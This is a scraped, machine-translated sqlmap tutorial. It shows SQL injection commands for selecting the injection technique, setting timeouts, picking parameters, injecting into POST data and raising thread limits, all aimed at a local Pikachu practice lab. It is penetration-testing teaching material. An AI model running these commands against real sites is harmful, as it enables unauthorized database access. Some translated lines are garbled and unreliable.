当前位置:网站首页>Sqlmap tutorial (III) practical skills II
Sqlmap tutorial (III) practical skills II
2022-07-06 05:58:00 【A τθ】
One 、–technique Use the specified injection method
In some projects , It is inevitable that the network will react slowly ,idc And testing sqlmap The ability of . As a professional penetration tester , We must be fast, accurate and ruthless .
There are some SQL The injection point only allows time injection , It is designated at this time SQLMAP The injection type of is T
Here are --technique Explanation of the value of the parameter :
B:Boolean-basedblindSQLinjection( Boolean Injection )
E:Error-basedSQLinjection( Error reporting injection )
U:UNIONquerySQLinjection( Query injection can be combined )
S:StackedqueriesSQLinjection( Multi statement query injection )
T:Time-basedblindSQLinjection( Injection based on time delay )
Q:InlineSQLInjection( Inline Injection )
Two 、 Use time-based delay injection
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=T
Support multiple injection detection , The default is all :
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --technique=BEUT
3、 ... and 、 Set timeout
--time-out This parameter is to set the timeout Some web pages are slow to respond , You can use this parameter to increase the access timeout time . The default is 30
sqlmap -u "192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" --dbms mysql -v 3 -D pikachu --timeout=10
Four 、 Read text for SQL Injection detection
sqlmap -r post.txt
5、 ... and 、 Specify parameters to inject
-p Specify the parameters to be tested
sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1
Use * For injection
If url When it is pseudo static , have access to * No. indicates that this is the place of detection ;
sqlmap -u "http://192.168.0.103/06/vul/sqli/id/1*./html POST Inject sqlmap -u "http://192.168.0.103/06/vul/sqli/sqli_id.php" --data "id=1&submit=1" -p id -v 1
6、 ... and 、 Modify the default maximum thread size
sqlmap/lib/core/settings.py
The default maximum thread is 10 You can set the maximum number of threads to 100
MAX_NUMBER_OF_THREADS = 100
边栏推荐
- Cannot build artifact 'test Web: War expanded' because it is included into a circular depend solution
- J'ai un chaton.
- Download, install and use NVM of node, and related use of node and NRM
- P2802 go home
- B站刘二大人-多元逻辑回归 Lecture 7
- Analysis of grammar elements in turtle Library
- Mysql database master-slave cluster construction
- 養了只小猫咪
- 公司視頻加速播放
- Web service connector: Servlet
猜你喜欢
Station B, Master Liu Er - back propagation
[Jiudu OJ 08] simple search x
c语言——冒泡排序
Download, install and use NVM of node, and related use of node and NRM
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
清除浮动的方式
B站刘二大人-数据集及数据加载 Lecture 8
Practice sharing: how to safely and quickly migrate from CentOS to openeuler
Analysis of grammar elements in turtle Library
Station B, Master Liu Er - dataset and data loading
随机推荐
The difference and usage between continue and break
Auto.js学习笔记17:基础监听事件和UI简单的点击事件操作
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Detailed explanation of BF and KMP
Arrays and collections
First knowledge database
H3C V7 switch configuration IRF
公司視頻加速播放
Introduction to promql of # yyds dry goods inventory # Prometheus
Classes and objects (I) detailed explanation of this pointer
The digital economy has broken through the waves. Is Ltd a Web3.0 website with independent rights and interests?
Jushan database appears again in the gold fair to jointly build a new era of digital economy
養了只小猫咪
查询生产订单中某个(些)工作中心对应的标准文本码
Raised a kitten
What preparations should be made for website server migration?
Dynamic programming -- knapsack problem
Huawei BFD configuration specification
局域网同一个网段通信过程
Practice sharing: how to safely and quickly migrate from CentOS to openeuler